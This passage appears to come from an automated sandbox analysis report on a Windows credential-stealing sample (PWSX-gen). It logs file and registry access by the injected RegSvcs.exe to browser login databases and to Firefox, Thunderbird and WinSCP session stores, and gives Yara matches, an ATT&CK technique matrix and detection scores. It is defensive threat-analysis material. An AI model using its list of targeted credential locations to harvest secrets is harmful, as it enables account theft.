                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7404, type: MEMORYSTR
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts121
                        Windows Management Instrumentation
                        1
                        DLL Side-Loading
                        311
                        Process Injection
                        1
                        Masquerading
                        2
                        OS Credential Dumping
                        421
                        Security Software Discovery
                        Remote Services1
                        Email Collection
                        11
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                        DLL Side-Loading
                        1
                        Disable or Modify Tools
                        1
                        Input Capture
                        151
                        Virtualization/Sandbox Evasion
                        Remote Desktop Protocol1
                        Input Capture
                        1
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)151
                        Virtualization/Sandbox Evasion
                        1
                        Credentials in Registry
                        1
                        Application Window Discovery
                        SMB/Windows Admin Shares11
                        Archive Collected Data
                        2
                        Non-Application Layer Protocol
                        Automated ExfiltrationData Encrypted for Impact
                        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook311
                        Process Injection
                        NTDS1
                        System Network Configuration Discovery
                        Distributed Component Object Model2
                        Data from Local System
                        13
                        Application Layer Protocol
                        Traffic DuplicationData Destruction
                        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                        Deobfuscate/Decode Files or Information
                        LSA Secrets1
                        File and Directory Discovery
                        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                        Obfuscated Files or Information
                        Cached Domain Credentials24
                        System Information Discovery
                        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                        Software Packing
                        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                        DLL Side-Loading
                        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                        Hide Legend

                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand
                        SourceDetectionScannerLabelLink
                        SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe26%VirustotalBrowse
                        SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe100%Joe Sandbox ML
                        No Antivirus matches
                        No Antivirus matches
                        SourceDetectionScannerLabelLink
                        mail.nationalkham.com0%VirustotalBrowse
                        SourceDetectionScannerLabelLink
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.tiro.com0%URL Reputationsafe
                        http://www.goodfont.co.kr0%URL Reputationsafe
                        http://www.carterandcone.coml0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.sajatypeworks.com0%URL Reputationsafe
                        http://www.typography.netD0%URL Reputationsafe
                        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
